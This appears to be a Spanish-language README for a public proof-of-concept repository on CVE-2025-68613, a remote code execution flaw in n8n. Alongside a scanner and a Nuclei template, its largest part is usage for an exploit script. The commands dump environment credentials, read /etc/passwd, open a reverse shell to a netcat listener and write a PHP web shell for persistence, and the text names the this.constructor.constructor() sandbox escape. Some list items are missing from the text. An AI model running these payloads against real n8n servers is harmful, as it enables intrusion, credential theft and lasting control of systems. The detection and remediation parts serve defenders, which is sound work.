
PoC público + Escáner e investigación para CVE-2025-68613: RCE crítico en n8n Workflow Automation mediante Inyección de Expresiones (CVSS 10.0). Incluye herramientas de detección, exploit completo y guía de remediación.

CVE-2025-68613 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) descubierta en n8n, una popular plataforma de automatización de flujos de trabajo de código abierto. Esta vulnerabilidad permite a usuarios autenticados ejecutar código arbitrario en el servidor, lo que potencialmente puede llevar a un compromiso total del sistema.
n8n es una plataforma de automatización de flujos de trabajo de código abierto que permite a los usuarios:
Las organizaciones usan n8n para:
Este papel central en la infraestructura de TI hace que las vulnerabilidades sean particularmente peligrosas, ya que pueden proporcionar a los atacantes acceso a redes enteras y datos sensibles.
Este repositorio incluye herramientas listas para usar para la detección de vulnerabilidades y pruebas de explotación:
cve-2025-68613-scanner.pyPropósito: Detección segura y no explotadora de instancias vulnerables de n8n
Características:
Uso:```bash python3 cve-2025-68613-scanner.py -u http://target:5678
**Salida**:
- Código de salida 0: No vulnerable
- Código de salida 1: Versión indeterminada (puede estar parcheada u oculta)
- Código de salida 2: Versión vulnerable detectada
### 2. Plantilla de Nuclei: `CVE-2025-68613.yaml`
**Propósito**: Detección automatizada de vulnerabilidades y prueba básica de evaluación de expresiones
**Características**:
- Requiere token de autenticación válido
- Prueba la capacidad de inyección de expresiones
- Intenta leer el contexto global de Node.js (process.platform)
- Crea flujos de trabajo de prueba para validar el vector RCE
- Clasificación de gravedad Crítica CVSS 10.0
**Uso**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt
exploit_cve-2025-68613.pyPropósito: Prueba de concepto completa con múltiples cargas de ataque
Características:
Requisitos:
Instalación:```bash pip install requests chmod +x exploit_cve-2025-68613.py
**Ejemplos de uso**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload info
# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload cmd --command "whoami"
# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload env
# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload read --file "/etc/passwd"
# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload write \
--file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
Cómo funciona:
this.constructor.constructor()process.platform u otras APIs de Node.jsCódigos de salida:
En términos simples: n8n permite a los usuarios escribir expresiones en flujos de trabajo para procesar datos dinámicamente. Sin embargo, estas expresiones se evalúan sin un entorno aislado adecuado, lo que permite a los atacantes salir del contexto de ejecución previsto y ejecutar código arbitrario en el servidor.